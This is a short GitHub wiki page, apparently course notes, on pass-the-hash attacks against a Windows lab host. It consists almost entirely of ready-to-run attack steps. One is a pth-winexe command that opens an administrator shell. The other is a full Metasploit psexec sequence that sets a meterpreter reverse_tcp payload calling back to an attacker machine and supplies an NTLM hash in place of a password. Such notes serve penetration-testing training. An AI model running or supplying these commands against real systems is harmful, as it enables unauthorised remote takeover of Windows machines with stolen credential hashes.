Network Vulnerabilities: Pass the Hash - Paiet/SEC-335 GitHub Wiki

Pass the hash

Allows you to pass the hash value for a password instead of password
Shell will PTH-WINEXE
- pth-winexe -U administrator% //10.0.0.230 cmd

Shell with Metasploit

search psexec
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.243 (Kali)
set LPORT 443
set RHOST 10.0.0.230 (Win2kR2)
set SMBPass AAD3B435B51404EEAAD3B435B51404EE:A0C472FF1EF63D13F12F347B02CAC336
set SMBUser administrator
exploit
shell